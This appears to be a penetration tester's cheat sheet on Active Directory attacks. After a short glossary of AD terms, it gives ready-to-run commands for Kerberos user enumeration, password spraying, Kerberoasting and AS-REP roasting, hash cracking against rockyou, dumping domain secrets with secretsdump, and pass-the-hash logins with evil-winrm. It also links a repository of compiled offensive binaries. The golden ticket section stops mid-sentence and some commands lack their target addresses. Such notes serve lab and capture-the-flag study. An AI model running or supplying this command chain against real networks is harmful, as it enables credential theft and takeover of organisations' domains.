Active Directory
Active Directory is a collection of machines and servers connected inside of domains, that are a collective part of a bigger forest of domains, that make up the Active Directory network.
An AD forest is a collection of one or more domain trees inside of an Active Directory network. It is what categorizes the parts of the network as a whole.
Trees - A hierarchy of domains in Active Directory Domain Services
Domains - Used to group and manage objects
Organizational Units (OUs) - Containers for groups, computers, users, printers and other OUs
Trusts - Allows users to access resources in other domains
Objects - users, groups, printers, computers, shares
Domain Services - DNS Server, LLMNR, IPv6
Domain Schema - Rules for object creation
net user # display local users
net user /domain # display domain joined users
net user mike /domain # display domain joined userinfo
Kerberos TCP/88
Enumerate users
./kerbrute userenum --dc -d example.local userlist.txt -t 100 #enumerate users using kerbrute
./kerbrute userenum --dc example.local -d example.local User.txt #sometimes it works better with domain names
Harvesting tickets you can use a utility called rubeus to harvest tickets: https://github.com/r3motecontrol/Ghostpack-CompiledBinaries
Rubeus.exe harvest /interval:30
bruteforce tickets This will take a given password and "spray" it against all found users then give the .kirbi TGT if successful. This attack can lock you out.
Rubeus.exe brute /password:Password1 /noticket
Kerberoasting allows us to request a service ticket for any service with a registered SPN then use that ticket to crack the service password. If the service has a registered SPN then it can be Kerberoastable. Success of the attack depends on password strength and privileges of accounts.
Using impacket:
GetUserSPNs.py controller.local/Machine1:Password1 -dc-ip -request
Useing Rubeus
Rubeus.exe kerberoast /outfile:hashes.txt /format:hashcat
and then crack
hashcat -m 13100 hashes.txt -a 0 /usr/share/wordlists/rockyou.txt --force
Now what? You can use those cracked passwords to run services with the permissions assigned.
runas /netonly /User:ServiceAccount1 powershell.exe
AS-REP Roasting
Similar to Kerberoasting AS-REP Roasting is an attack against accounts with the "Do not require Kerberos preauthentication" or UF_DONT_REQUIRE_PREAUTH set to true.
Example using impacket:
for user in $(cat users.txt); do impacket-GetNPUsers -no-pass -dc-ip htb/${user} | grep -v Impacket; done
Example using Rubeus:
Rubeus.exe asreproast /outfile:hashes.txt /format:hashcat
And the crack:
hashcat -m 18200 hashes.txt /usr/share/wordlists/rockyou.txt --force
Golden ticket attack
A golden ticket attack works by dumping the ticket-granting ticket of any user on the domain this would preferably be a domain admin however for a golden ticket you would dump the krbtgt ticket and for a silver ticket,
Dumping secrets
If you get creds for a user who can, you can use impacket secretdumps.py to get hashes from NTDIS.DIT
impacket-secretsdump backup:password1234@ > secrets.txt
pwd dump format:
<Username>:<User ID>:<LM hash>:<NT hash>:<Comment>:<Home Dir>:
Note LM hash is not used and only there for backwards compatibility. will be a the hash of "no password" (aad3b435b51404eeaad3b435b51404ee)
pass the hash
using evil-winrm we can pass hashes found to gain access
./evil-winrm.rb -i -u Administrator -H e4876a80a723612986d7609aa5ebc12b